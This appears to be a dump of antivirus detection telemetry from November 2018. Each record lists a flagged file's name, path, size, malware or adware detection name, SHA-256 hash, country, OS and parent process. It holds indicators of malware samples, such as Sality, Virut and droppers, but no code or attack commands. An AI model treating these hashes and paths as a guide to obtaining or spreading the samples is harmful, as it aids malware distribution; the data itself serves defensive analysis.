  Row(detection=Row(filename='young.milf.pussy.xxx.webrip.wmv-ohrly.rar', filepath='C:\\_Nh\\Young.Milf.Pussy.XXX.WEBRiP.WMV-OHRLY-4\\.tmp\\Young.Milf.Pussy.XXX.WEBRiP.WMV-OHRLY.rar', filesize=5376000, name='TR/Agent.htex.#M1.#R1'), hash='3c4b1055bcc2b72e8ade5725baf9050d9ce6b6629e415620921bf03e4601ccf3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Newshosting\\newshosting.exe', parentsize=345088, timestamp='2018-11-02T08:15:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jet40sp5_9xnt.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\aes731\\aspenonev7.3dvd1\\core\\mdac27sp1\\Jet40SP5_9xNT.exe', filesize=2752000, name='W32/Virut.Gen.#M1.#R1'), hash='3c62c512ced629a03d08b8bd48dfc67b23a6d2c7ac7aaf73e307c050806188bc', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe802_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe802 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T02:41:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='synctask.exe', filepath='C:\\Users\\X\\AppData\\Local\\49EDD8~1\\SyncTask.exe', filesize=640000, name='Adware/DealPly.3c8ebd.#M1.#R1'), hash='3c8ebdd436177dc27e91b78ce326e7565d0ea00cdffd6545048e9b2987c59075', metadata=Row(cmdline='\\/Check', country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=359936, timestamp='2018-11-02T22:14:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194902-092d2db9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_51b8112a\\AVSCAN-20181102-194642-FC25D1A4\\AVSCAN-20181102-194902-092D2DB9', filesize=640000, name='Adware/DealPly.3c8ebd.#M1.#R1'), hash='3c8ebdd436177dc27e91b78ce326e7565d0ea00cdffd6545048e9b2987c59075', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T22:49:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='checkmate.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\is-CU4QE.tmp\\Checkmate.exe', filesize=1024000, name='Adware/CsdiMonetize.udgxz.#M1.#R1'), hash='3cf92b23871c00df72e252f8aa0fb6d33aa1ce37796088d40e0a1f2e0a936660', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:29:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4935812.vir', filepath='\\\\?\\C:\\Program Files (x86)\\Bring\\4935812.VIR', filesize=1024000, name='Adware/CsdiMonetize.udgxz.#M1.#R1'), hash='3cf92b23871c00df72e252f8aa0fb6d33aa1ce37796088d40e0a1f2e0a936660', metadata=Row(cmdline=None, country='CR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:16:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='initwain.exe', filepath='C:\\Program Files (x86)\\Nuance\\PaperPort\\initwain.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='3d53931f1402e34996fee1c43dc6424521d912037ec0ac0c37f24647c4212cd2', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:0NU7deI9ckOKuNTJ.1', country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:49:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3d5ec02ecb4fd63f5b804aacd3ded40da54ee436bff151da545de7216c5b67f0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3D5EC02ECB4FD63F5B804AACD3DED40DA54EE436BFF151DA545DE7216C5B67F0', filesize=1312000, name='TR/Crypt.XPACK.Gen.#M300.#R3904'), hash='3d5ec02ecb4fd63f5b804aacd3ded40da54ee436bff151da545de7216c5b67f0', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:00:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3d5ec02ecb4fd63f5b804aacd3ded40da54ee436bff151da545de7216c5b67f0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3D5EC02ECB4FD63F5B804AACD3DED40DA54EE436BFF151DA545DE7216C5B67F0', filesize=1312000, name='TR/Crypt.XPACK.Gen.#M300.#R3904'), hash='3d5ec02ecb4fd63f5b804aacd3ded40da54ee436bff151da545de7216c5b67f0', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:06:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3d5ec02ecb4fd63f5b804aacd3ded40da54ee436bff151da545de7216c5b67f0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3D5EC02ECB4FD63F5B804AACD3DED40DA54EE436BFF151DA545DE7216C5B67F0', filesize=1312000, name='TR/Crypt.XPACK.Gen.#M300.#R3904'), hash='3d5ec02ecb4fd63f5b804aacd3ded40da54ee436bff151da545de7216c5b67f0', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:38:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winbox.exe', filepath='D:\\winbox.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='3d6c50af69cb54c2ff8937975591890b946c4efe5fc3619ffb56093da09f95db', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T07:45:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winbox.exe', filepath='D:\\winbox.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='3d6c50af69cb54c2ff8937975591890b946c4efe5fc3619ffb56093da09f95db', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T13:10:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-164042-491f13a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_60648797\\AVSCAN-20181102-164018-4598EC5A\\AVSCAN-20181102-164042-491F13A2', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='3d862099d9b548aa505eb39cab9fd8061c0c600a45bce604df67abbef4498314', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:40:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='планирование 2017.bat', filepath='G:\\планирование 2017\\планирование 2017.bat', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='3d862099d9b548aa505eb39cab9fd8061c0c600a45bce604df67abbef4498314', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3231232, timestamp='2018-11-02T09:40:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3d940c436f9525480c10612bec3cef2f4504ae5920b045eadca2de14f504aa35', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-2.available\\Avira\\3D940C436F9525480C10612BEC3CEF2F4504AE5920B045EADCA2DE14F504AA35', filesize=640000, name='ADWARE/BrowseFox.Gen7.#M300.#R601892'), hash='3d940c436f9525480c10612bec3cef2f4504ae5920b045eadca2de14f504aa35', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T06:05:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~pp78ce.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~pp78CE.tmp', filesize=128000, name='HEUR/AGEN.1030705.#M1.#R1'), hash='3dfb3bcd7618c2bc34a4b30c7062e1d0204afe188d4c326613667d5c1ce30a25', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:12:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~ppb836.tmp', filepath='\\\\?\\E:\\Users\\X\\AppData\\Local\\Temp\\~ppB836.tmp', filesize=128000, name='HEUR/AGEN.1030705.#M1.#R1'), hash='3dfb3bcd7618c2bc34a4b30c7062e1d0204afe188d4c326613667d5c1ce30a25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T00:17:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~pp78ce.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~pp78CE.tmp', filesize=128000, name='HEUR/AGEN.1030705.#M1.#R1'), hash='3dfb3bcd7618c2bc34a4b30c7062e1d0204afe188d4c326613667d5c1ce30a25', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:14:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msqgzqxrj.exe', filepath='\\\\?\\C:\\ProgramData\\msqgzqxrj.exe', filesize=85568000, name='WORM/Lodbak.Gen.#M300.#R7829'), hash='3e2f914fe4c5cb80dc648a408389598a2df019aa98f70e1e9c91312759efa62a', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:52:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ioce428cc5b-5afa-574b-94a2-76d18568564f', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP19.0.0\\Temp\\iocE428CC5B-5AFA-574B-94A2-76D18568564F', filesize=512000, name='TR/Crypt.XPACK.Gen.#M300.#R2423'), hash='3e2fd2fb2bcddf7bd84a09cd1006a27b331b013dbfdcaac0a80fe27ad18b791e', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-02T14:26:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3f81ed12cf783663ace3f754bb552275736986b0a32bad2f9b6b660428c149a7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3F81ED12CF783663ACE3F754BB552275736986B0A32BAD2F9B6B660428C149A7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3f81ed12cf783663ace3f754bb552275736986b0a32bad2f9b6b660428c149a7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:46:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-084111-f2db9655', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-084111-F2DB9655', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='3f81ed12cf783663ace3f754bb552275736986b0a32bad2f9b6b660428c149a7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:43:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3f81ed12cf783663ace3f754bb552275736986b0a32bad2f9b6b660428c149a7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3F81ED12CF783663ACE3F754BB552275736986B0A32BAD2F9B6B660428C149A7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3f81ed12cf783663ace3f754bb552275736986b0a32bad2f9b6b660428c149a7', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:21:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3f81ed12cf783663ace3f754bb552275736986b0a32bad2f9b6b660428c149a7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3F81ED12CF783663ACE3F754BB552275736986B0A32BAD2F9B6B660428C149A7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3f81ed12cf783663ace3f754bb552275736986b0a32bad2f9b6b660428c149a7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:14:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wspsetup.exe', filepath='C:\\Users\\X\\Downloads\\wspsetup.exe', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T18:22:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-192427-6d1840df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_824148e7\\AVSCAN-20181102-192316-675D3F4C\\AVSCAN-20181102-192427-6D1840DF', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:24:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-010458-999620d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_29031212\\AVSCAN-20181102-010144-894F333E\\AVSCAN-20181102-010458-999620D9', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:05:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wspsetup.exe', filepath='F:\\00\\__DATEN von 2015 bis 2017 12\\2018\\2018 06\\wspsetup.exe', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline='-r', country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Free 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-02T00:05:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wspsetup(1).exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\wspsetup(1).exe', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:07:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wspsetup(2).exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\wspsetup(2).exe', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:07:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-013301-26972f3d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_29031212\\AVSCAN-20181102-012241-F2AFFE1A\\AVSCAN-20181102-013301-26972F3D', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:33:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-011603-d1467068', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_29031212\\AVSCAN-20181102-010557-9E76398A\\AVSCAN-20181102-011603-D1467068', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:16:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1592fd65dfc94b23871c4dc6bd91127d33469894', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\1592fd65dfc94b23871c4dc6bd91127d33469894', filesize=384000, name='Adware/DealPly.418fd9.#M1.#R1'), hash='418fd9150667f7d2d319d7f43afa704e6ec91bcb8a5f7b648e2d638185af9a8b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:37:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mfhhxdn.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\mfhhxdn.exe', filesize=1856000, name='HEUR/AGEN.1015900.#M1.#R1'), hash='4211746b020025be2362634cf7b6c5fe84b1386938edb7df4890edb2c8e51d91', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:04:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zbkketin.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\zbkketin.exe', filesize=1856000, name='HEUR/AGEN.1015900.#M1.#R1'), hash='4211746b020025be2362634cf7b6c5fe84b1386938edb7df4890edb2c8e51d91', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:04:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ni license activator.exe', filepath='C:\\Users\\X\\Desktop\\program\\Labview\\NI License Activator.exe', filesize=576000, name='HEUR/AGEN.1000498.#M1.#R1'), hash='4212081a0a93651413f180c8e9e5e95481097b6b66663cca361113bb858f2297', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:LDWrswCQlUiBX9qi.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=116928, timestamp='2018-11-02T13:33:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-040532-ce5a781e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-040532-CE5A781E', filesize=640000, name='X97M/Escop.SJ.#M1.#R1'), hash='4245159132041e5c13593d7ecadda6c1986f7b6354552e5e71bbcc64a01359ce', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:07:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='start.exe', filepath='\\\\192.168.0.100\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\生產管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='425632d45efdb7dd22ce3554f0d2cb222a02b0875f26746bcd5550470e73a9da', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:1upUepgZNU2jR\\\\\\/+9.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:02:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000073fa', filepath='C:\\Windows\\Temp\\a80d3f62-da9e-492a-8f9e-13c054dda98b\\tmp0000027c\\tmp000073fa', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='426b42df997d405984924d9b1c637b86b8405c1f9c5bdbff8e3083e76e0281ff', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.3.915.11577\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T11:09:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='stage1_se.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\STAGE1_SE\\STAGE1_SE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='se.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\SE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:28:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='st1.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\VOICE\\ST1\\ST1.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:28:11Z'), dt=datetime.date(2018, 11, 2)),
